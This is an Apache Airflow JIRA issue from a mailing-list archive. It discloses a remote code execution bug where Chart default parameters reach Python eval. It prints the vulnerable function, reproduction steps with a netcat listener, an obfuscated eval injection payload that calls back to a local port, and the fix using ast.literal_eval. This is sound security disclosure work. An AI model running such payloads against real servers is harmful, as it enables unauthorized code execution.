airflow-commits mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Rui Wang (JIRA)" <j...@apache.org>
Subject [jira] [Created] (AIRFLOW-933) Security - Airflow Use of Eval Allows for Remote Code Execution
Date Wed, 01 Mar 2017 21:36:45 GMT
Rui Wang created AIRFLOW-933:
--------------------------------

             Summary: Security - Airflow Use of Eval Allows for Remote Code Execution
                 Key: AIRFLOW-933
                 URL: https://issues.apache.org/jira/browse/AIRFLOW-933
             Project: Apache Airflow
          Issue Type: Bug
            Reporter: Rui Wang
            Assignee: Rui Wang


mpact: Any user with the ability to create or edit Charts may execute arbitrary code on the
Airflow server.
Location: The Default Parameters form eld sent when saving a Chart located at /admin/chart/new/
Description: The Chart functionality allows for the definition of Default Parameters, which
are baseline constraints for the values within a chart.
This data is user-controllable and passed directly to a Python eval, which will execute code:
def label_link(v, c, m, p): 
  try:
    default_params = eval(m.default_params) 
  except:
    default_params = {} 
  url = url_for(
    'airflow.chart', chart_id=m.id, iteration_no=m.iteration_no,
    **default_params)
  return Markup("<a href='{url}'>{m.label}</a>".format(**locals()))

Reproduction Steps:
1. Configure a local instance of Airflow, and start a local netcat listener with the following
shell command: nc -l 1337.
2. Access Airflow as a user able to create or edit Charts.
3. Browse to /admin/chart/new to bring-up the UI for creating a Chart.
4. In its Default Parameters field, and enter-in the following example payload:
  (lambda __g: [(urllib.request.urlopen('http://127.0.0.1:1337/').read (), None)[1] for __g['urllib']
in [(__import__('urllib.request', __g, __g))]][0])(globals())

5. Save the Chart, and observe that the application has made a network request to your listener,
indicating that your code has executed.
Remediation: Use the Python method ast.literal_eval (https://docs.python.org/3/library/ast.html#ast.literal_eval)
which safely parses its input, rather than executing it as code.



--
This message was sent by Atlassian JIRA
(v6.3.15#6346)

Mime
View raw message